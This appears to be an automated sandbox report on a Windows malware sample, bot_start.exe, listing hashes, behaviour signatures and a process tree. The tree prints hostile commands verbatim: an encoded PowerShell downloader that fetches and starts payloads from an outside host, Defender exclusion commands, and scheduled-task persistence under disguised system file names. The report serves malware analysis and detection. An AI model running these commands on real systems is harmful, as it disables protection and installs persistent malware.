Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/07/2024, 02:51

General

  • Target

    bot_start.exe

  • Size

    2.5MB

  • MD5

    62dec8c537e3aa76b294ab744b20d245

  • SHA1

    1f4ec4852cd84d32a0d26ba0e163a373811eaebd

  • SHA256

    cc97b59379bc6eafe5c5c9dc66f16d4795270e01dce613652359bc852ba0665a

  • SHA512

    f47bbf3260f0124ec947b3a37ce316700481a8c4d5d984c9012df85673eb0d2c8777396e5a957cfc900ed509045e50d196558e931a84df146115e950abd8f6a7

  • SSDEEP

    49152:SNkG6I1nPFf56dv26ot3VwBtF+kze3xqH1Hm4I6qxOli96Jyn5tzEde3Yx:S/fP9se6ot3VwBtF+kzeQHMdLcK6EtzY

Malware Config

Signatures

  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\bot_start.exe
    "C:\Users\Admin\AppData\Local\Temp\bot_start.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbgB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcABlAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBrAGkAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHQAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGsAbgB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgBzAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcAB6AGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAcwB5AHUAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAG0AYQBpAG4ALgBwAHkAJwAsACAAPAAjAHkAcgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAByAHQAIwA+ACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAGUAagBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG0AYQBpAG4ALgBwAHkAJwApACkAPAAjAGUAZQBrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAegB6AGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGYAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHAAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBuAGEAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBjAGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAGUAZQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAYwByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAoACQAcAB3AGQAKQAuAHAAYQB0AGgAIAA8ACMAaQBpAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBhAGkAbgAuAHAAeQAnACkAPAAjAHUAdwB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAbQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB1AHgAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQA8ACMAbABqAHEAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe
        "C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\backgroundTaskHost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:2224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\VC_redistx64.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:3068
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\Taskmgr.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:2736
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\logs\csrss.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:1332
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\dllhost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:4232
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9d2iv57AHI.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2204
          • C:\Windows\system32\chcp.com
            chcp 65001
            5⤵
              PID:3556
            • C:\Windows\system32\w32tm.exe
              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              5⤵
                PID:3920
              • C:\Users\Admin\AppData\dllhost.exe
                "C:\Users\Admin\AppData\dllhost.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                PID:2896
          • C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
            "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4944
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:856
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4564
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1036
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:3060
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Adobe\backgroundTaskHost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2348
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\backgroundTaskHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:5052
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Adobe\backgroundTaskHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4040
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "VC_redistx64V" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\VC_redistx64.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1428
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "VC_redistx64" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\VC_redistx64.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1828
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "VC_redistx64V" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\VC_redistx64.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4056
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "TaskmgrT" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\Taskmgr.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4004
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Taskmgr" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\Taskmgr.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2104
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "TaskmgrT" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\Taskmgr.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1380
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\csrss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:992
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\csrss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:388
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\csrss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4400
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\dllhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1916
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Admin\AppData\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1628
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4648
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        1⤵
        • Enumerates system info in registry
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1468
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff84284cc40,0x7ff84284cc4c,0x7ff84284cc58
          2⤵
            PID:2036
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,14353597814692388895,13732941761839805980,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1820 /prefetch:2
            2⤵
              PID:4380
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1960,i,14353597814692388895,13732941761839805980,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2012 /prefetch:3
              2⤵
                PID:3488
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,14353597814692388895,13732941761839805980,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2452 /prefetch:8
                2⤵
                  PID:4980
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,14353597814692388895,13732941761839805980,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3176 /prefetch:1
                  2⤵
                    PID:3280
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3348,i,14353597814692388895,13732941761839805980,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3368 /prefetch:1
                    2⤵
                      PID:1200
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4592,i,14353597814692388895,13732941761839805980,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4472 /prefetch:1
                      2⤵
                        PID:1376
                    • C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
                      "C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
                      1⤵
                        PID:2960
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe"
                        1⤵
                        • Enumerates system info in registry
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SendNotifyMessage
                        PID:2368
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff83241cc40,0x7ff83241cc4c,0x7ff83241cc58
                          2⤵
                            PID:4320
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2044,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2040 /prefetch:2
                            2⤵
                              PID:3348
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1912,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2440 /prefetch:3
                              2⤵
                                PID:2736
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2616 /prefetch:8
                                2⤵
                                  PID:2028
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3180 /prefetch:1
                                  2⤵
                                    PID:2560
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3300 /prefetch:1
                                    2⤵
                                      PID:4964
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3824,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3668 /prefetch:1
                                      2⤵
                                        PID:1520
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4372,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4816 /prefetch:8
                                        2⤵
                                          PID:2296
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4980,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4992 /prefetch:8
                                          2⤵
                                            PID:1468
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5008,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4996 /prefetch:1
                                            2⤵
                                              PID:3700
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4512,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3184 /prefetch:1
                                              2⤵
                                                PID:4168
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3160,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3352 /prefetch:1
                                                2⤵
                                                  PID:1676
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=832,i,13208791487318079333,14443129292726457272,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3148 /prefetch:8
                                                  2⤵
                                                    PID:4756
                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
                                                  1⤵
                                                    PID:2872
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                    1⤵
                                                      PID:3596
                                                    • C:\Users\Admin\AppData\Roaming\service.exe
                                                      C:\Users\Admin\AppData\Roaming\service.exe
                                                      1⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4768
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                        2⤵
                                                          PID:4088
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                            3⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2236

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                        Filesize

                                                        40B

                                                        MD5

                                                        60886d2abb73d2117a2c2fea0bb40b87

                                                        SHA1

                                                        cec8b4b244b47f11e7b64fcc675e0d7de7bbb985

                                                        SHA256

                                                        e756186e144e0340c8d326352eede0b120ce85ad525004ae844387d336d98978

                                                        SHA512

                                                        ed3e7637ad82b933da95a6459bb8d922f4952d67f6889b7c1fdda601b28a1c1e830b5f601235eeff337ea3824237d81eed395e32c7ef40e0dc07c3b6269672c1

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\13330f22-5fe1-462c-92c1-2d08f875c52d.tmp

                                                        Filesize

                                                        8KB

                                                        MD5

                                                        4155cb3a5e631d604f7f3bb778c96f15

                                                        SHA1

                                                        72f40740ba30b8cfbf3eeb27df1ff793ab6a9547

                                                        SHA256

